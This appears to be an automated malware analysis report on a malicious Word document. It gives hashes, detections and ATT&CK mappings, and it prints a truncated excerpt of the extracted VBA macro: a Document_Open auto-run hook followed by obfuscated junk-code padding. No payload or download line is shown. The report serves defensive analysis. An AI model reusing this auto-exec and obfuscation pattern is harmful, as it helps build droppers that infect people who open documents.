Office (OLE) malware analysis — malicious · 7c3e462113992570

MALICIOUS

Office (OLE)

233.5 KB Created: 2018-09-27 19:10:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 0abab5967d5a5a4ff831912d42afda8e SHA-1: 3b9c883257d1783769a9fe0042554edb30cac46e SHA-256: 7c3e462113992570ab81bf4298b16b02fed9451218dd5ea4da48bde2e25a2453

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Document_Open macro is configured to execute a Shell() command, indicating it's designed to download and execute a second-stage payload. The document body explicitly instructs the user to 'Enable Content', a common social engineering tactic to bypass macro security. The ClamAV detection name 'Doc.Trojan.tRat-6760546-1' further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Trojan.tRat-6760546-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.tRat-6760546-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 67015 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	67015 bytes
SHA-256: `d67d82dcb7ba8d5d2439a1628d1eab0ea3286f82bcba3df809b7cb2914625c5f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Set frm = New frmMain Call Hitler(frm.txtBox.Text) End Sub Attribute VB_Name = "IcT3wRl" Sub Hitler(BktQLcoOR) If 353 - 85 = 2851 - 2840 Then O1Vr9Adk = "YwQ3u2" End If mKYMrnX4 = 31274 fjOPHmAIg = O1Vr9Adk & mKYMrnX4 If 22 < 214 Then ' r1czxHEd Else ' GNL0k3 Debug.Print "CXoGijN" End If If 33 < 144 Then ' XI8BlL Else ' QQdvt Debug.Print "tcEzSKHI" End If If 387 + 36 = 24817 - 24816 Then GvpRc4uiy = "KgptN" End If rsnXWNK = "xmBwY1xO" BP89lN = GvpRc4uiy & rsnXWNK If 33 < 144 Then ' GluZQjb Else ' jZUvo MsgBox "PuTqA" End If If 387 + 36 = 24817 - 24816 Then GMYhy4kI = "obsAZH" End If nMftBK6Ww = "uiDtFCs7N" rWwEL = GMYhy4kI & nMftBK6Ww If 397 * 2 = 1948 - 1937 Then Zb2O1k = "wswE71" End If TpTHwrj = "Xt6IXVHy" XdNivab = Zb2O1k & TpTHwrj If 14 < 192 Then ' JgUos Else ' aSBDE Debug.Print "o4jRc2Yx" End If Dim V8GNVJb7 V8GNVJb7 = 131 While V8GNVJb7 < 351 V8GNVJb7 = V8GNVJb7 + 1 Wend rWx2EiUrO = 19607 kDVZRkc = adVuZ & V8GNVJb7 If 14 < 192 Then ' eLjGUu Else ' f7NP8G MsgBox "hgY0w" End If If 368 - 120 = 366 - 353 Then v2XYq = "C3fSHcjC" End If Eco8hD = 10665 bVRqmk9g = v2XYq & Eco8hD If 12 < 238 Then ' U3R460B Else ' a37o5O MsgBox "EIF8i" End If If 12 < 238 Then ' wAJCyaPO Else ' SPrBQD Debug.Print "b0VoCXNx" End If If 309 + 62 = 2586 - 2575 Then wl7LDy8x = "PY9kntcPL" End If gYun0QDK = 5982 UyBGE97V = wl7LDy8x & gYun0QDK If 15 < 230 Then ' leisZ8p Else ' PDwkjGSF Debug.Print "FOjTt2iW" End If If 309 + 62 = 2586 - 2575 Then NgUn29K8k = "DFjB6" End If NrHo9Ctc7 = "UioMBu8T" sr20gwITA = NgUn29K8k & NrHo9Ctc7 If 15 < 230 Then ' fv59JEY Else ' cLegw3W Debug.Print "R459ct" End If If 28 < 143 Then ' P6BG1H Else ' tJ8vEwB Debug.Print "MfjRPUE9r" End If If 24477 / 41 = 659 - 644 Then vadI7ko = "NVHyG" End If Ck6W82ItC = 49818 WF5dCQ4G = vadI7ko & Ck6W82ItC Dim KkFmWyK KkFmWyK = 225 While KkFmWyK <= 550 KkFmWyK = KkFmWyK + 11 Wend ZwKRa = "dMlSd6" wK7OiDZ = ongtCLxhy & KkFmWyK If 305 - 155 = -3533 + 3542 Then FEicHBZsw = "PwCezFomZ" End If XVh7rw = "uz9ajTg" dRoXQb = FEicHBZsw & XVh7rw Dim Y74WM5Nm3 Y74WM5Nm3 = 255 While Y74WM5Nm3 <= 513 Y74WM5Nm3 = Y74WM5Nm3 + 63 Wend rj9BmD = "UBF9ys" IWncv = bpPxYQG & Y74WM5Nm3 If 24 < 137 Then ' vO1m9PI0h Else ' wAwSs95 MsgBox "PNUVg0m" End If If 43 < 213 Then ' MYnRGL Else ' pLz3KW Debug.Print "RuTvjVP" End If Dim hzYioVrWj hzYioVrWj = 138 While hzYioVrWj < 496 hzYioVrWj = hzYioVrWj + 26 Wend GJS7qsb = 59014 OqAm9s = z0HLmPF92 & hzYioVrWj If 407 - 30 = -580 + 595 Then dQ4b3xDAZ = "Z7MusT" End If WH3YJzt = 65095 z129D = dQ4b3xDAZ & WH3YJzt Dim arK9HZw6 arK9HZw6 = 145 While arK9HZw6 <= 731 arK9HZw6 = arK9HZw6 + 15 Wend XULrBnCX = "vBz8W34LN" XBLMT8H = V9iDkdE & arK9HZw6 Dim utS9x utS9x = 145 While utS9x < 731 utS9x = utS9x + 15 Wend rs03wd = 65095 sNLlSPK = gyCzSgrF & utS9x Dim XPJRuNL XPJRuNL = 59 While XPJRuNL <= 535 XPJRuNL = XPJRuNL + 34 Wend iGSn0ba = 33375 Vz9t5 = xLQrsN & XPJRuNL If 12 < 179 Then ' LAFJT Else ' v3nyu Debug.Print "U0QCPg" End If If 43 < 154 Then ' w4nBMbrLu Else ' tsOJ2aERY Debug.Print "e1yCZqf" End If Dim UM4OaI6l5 UM4OaI6l5 = 48 While UM4OaI6l5 < 524 UM4OaI6l5 = UM4OaI6l5 + 2 Wend eSlLyiz6x = "aSIBsoHuy" XIkxm = JSyqrbI & UM4OaI6l5 If 962 - 7 = 2999 - 2997 Then xdyTvGE = "HYR7Z0H" End If qD0CUF2 = 5929 ljHCLTe = xdyTvGE & qD0CUF2 If 16 < 250 Then ' jra31L Else ' PsrCLdoS Debug.Print "HU3V142J" End If If 16 < 250 Then ' nkOQDys8 Else ' e5Zs8atG MsgBox "MsfPWzX" End If If 877 - 30 = -1765 + 1780 Then D2DdT = "I7bWd5G" End If fNYZfsKA = 33909 wUjPx = D2DdT & fNYZfsKA Dim BBalRrW0X BBalRrW0X = 141 While BBalRrW0X < 346 BBalRrW0X = BBalRrW0X + 11 Wend jHCIqR ... (truncated)

SHA-256: d67d82dcb7ba8d5d2439a1628d1eab0ea3286f82bcba3df809b7cb2914625c5f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "IcT3wRl"
Sub Hitler(BktQLcoOR)
If 353 - 85 = 2851 - 2840 Then
O1Vr9Adk = "YwQ3u2"
End If
mKYMrnX4 = 31274
fjOPHmAIg = O1Vr9Adk & mKYMrnX4
If 22 < 214 Then
' r1czxHEd
Else
' GNL0k3
Debug.Print "CXoGijN"
End If
If 33 < 144 Then
' XI8BlL
Else
' QQdvt
Debug.Print "tcEzSKHI"
End If
If 387 + 36 = 24817 - 24816 Then
GvpRc4uiy = "KgptN"
End If
rsnXWNK = "xmBwY1xO"
BP89lN = GvpRc4uiy & rsnXWNK
If 33 < 144 Then
' GluZQjb
Else
' jZUvo
MsgBox "PuTqA"
End If
If 387 + 36 = 24817 - 24816 Then
GMYhy4kI = "obsAZH"
End If
nMftBK6Ww = "uiDtFCs7N"
rWwEL = GMYhy4kI & nMftBK6Ww
If 397 * 2 = 1948 - 1937 Then
Zb2O1k = "wswE71"
End If
TpTHwrj = "Xt6IXVHy"
XdNivab = Zb2O1k & TpTHwrj
If 14 < 192 Then
' JgUos
Else
' aSBDE
Debug.Print "o4jRc2Yx"
End If
Dim V8GNVJb7
V8GNVJb7 = 131
While V8GNVJb7 < 351
V8GNVJb7 = V8GNVJb7 + 1
Wend
rWx2EiUrO = 19607
kDVZRkc = adVuZ & V8GNVJb7
If 14 < 192 Then
' eLjGUu
Else
' f7NP8G
MsgBox "hgY0w"
End If
If 368 - 120 = 366 - 353 Then
v2XYq = "C3fSHcjC"
End If
Eco8hD = 10665
bVRqmk9g = v2XYq & Eco8hD
If 12 < 238 Then
' U3R460B
Else
' a37o5O
MsgBox "EIF8i"
End If
If 12 < 238 Then
' wAJCyaPO
Else
' SPrBQD
Debug.Print "b0VoCXNx"
End If
If 309 + 62 = 2586 - 2575 Then
wl7LDy8x = "PY9kntcPL"
End If
gYun0QDK = 5982
UyBGE97V = wl7LDy8x & gYun0QDK
If 15 < 230 Then
' leisZ8p
Else
' PDwkjGSF
Debug.Print "FOjTt2iW"
End If
If 309 + 62 = 2586 - 2575 Then
NgUn29K8k = "DFjB6"
End If
NrHo9Ctc7 = "UioMBu8T"
sr20gwITA = NgUn29K8k & NrHo9Ctc7
If 15 < 230 Then
' fv59JEY
Else
' cLegw3W
Debug.Print "R459ct"
End If
If 28 < 143 Then
' P6BG1H
Else
' tJ8vEwB
Debug.Print "MfjRPUE9r"
End If
If 24477 / 41 = 659 - 644 Then
vadI7ko = "NVHyG"
End If
Ck6W82ItC = 49818
WF5dCQ4G = vadI7ko & Ck6W82ItC
Dim KkFmWyK
KkFmWyK = 225
While KkFmWyK <= 550
KkFmWyK = KkFmWyK + 11
Wend
ZwKRa = "dMlSd6"
wK7OiDZ = ongtCLxhy & KkFmWyK
If 305 - 155 = -3533 + 3542 Then
FEicHBZsw = "PwCezFomZ"
End If
XVh7rw = "uz9ajTg"
dRoXQb = FEicHBZsw & XVh7rw
Dim Y74WM5Nm3
Y74WM5Nm3 = 255
While Y74WM5Nm3 <= 513
Y74WM5Nm3 = Y74WM5Nm3 + 63
Wend
rj9BmD = "UBF9ys"
IWncv = bpPxYQG & Y74WM5Nm3
If 24 < 137 Then
' vO1m9PI0h
Else
' wAwSs95
MsgBox "PNUVg0m"
End If
If 43 < 213 Then
' MYnRGL
Else
' pLz3KW
Debug.Print "RuTvjVP"
End If
Dim hzYioVrWj
hzYioVrWj = 138
While hzYioVrWj < 496
hzYioVrWj = hzYioVrWj + 26
Wend
GJS7qsb = 59014
OqAm9s = z0HLmPF92 & hzYioVrWj
If 407 - 30 = -580 + 595 Then
dQ4b3xDAZ = "Z7MusT"
End If
WH3YJzt = 65095
z129D = dQ4b3xDAZ & WH3YJzt
Dim arK9HZw6
arK9HZw6 = 145
While arK9HZw6 <= 731
arK9HZw6 = arK9HZw6 + 15
Wend
XULrBnCX = "vBz8W34LN"
XBLMT8H = V9iDkdE & arK9HZw6
Dim utS9x
utS9x = 145
While utS9x < 731
utS9x = utS9x + 15
Wend
rs03wd = 65095
sNLlSPK = gyCzSgrF & utS9x
Dim XPJRuNL
XPJRuNL = 59
While XPJRuNL <= 535
XPJRuNL = XPJRuNL + 34
Wend
iGSn0ba = 33375
Vz9t5 = xLQrsN & XPJRuNL
If 12 < 179 Then
' LAFJT
Else
' v3nyu
Debug.Print "U0QCPg"
End If
If 43 < 154 Then
' w4nBMbrLu
Else
' tsOJ2aERY
Debug.Print "e1yCZqf"
End If
Dim UM4OaI6l5
UM4OaI6l5 = 48
While UM4OaI6l5 < 524
UM4OaI6l5 = UM4OaI6l5 + 2
Wend
eSlLyiz6x = "aSIBsoHuy"
XIkxm = JSyqrbI & UM4OaI6l5
If 962 - 7 = 2999 - 2997 Then
xdyTvGE = "HYR7Z0H"
End If
qD0CUF2 = 5929
ljHCLTe = xdyTvGE & qD0CUF2
If 16 < 250 Then
' jra31L
Else
' PsrCLdoS
Debug.Print "HU3V142J"
End If
If 16 < 250 Then
' nkOQDys8
Else
' e5Zs8atG
MsgBox "MsfPWzX"
End If
If 877 - 30 = -1765 + 1780 Then
D2DdT = "I7bWd5G"
End If
fNYZfsKA = 33909
wUjPx = D2DdT & fNYZfsKA
Dim BBalRrW0X
BBalRrW0X = 141
While BBalRrW0X < 346
BBalRrW0X = BBalRrW0X + 11
Wend
jHCIqR
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.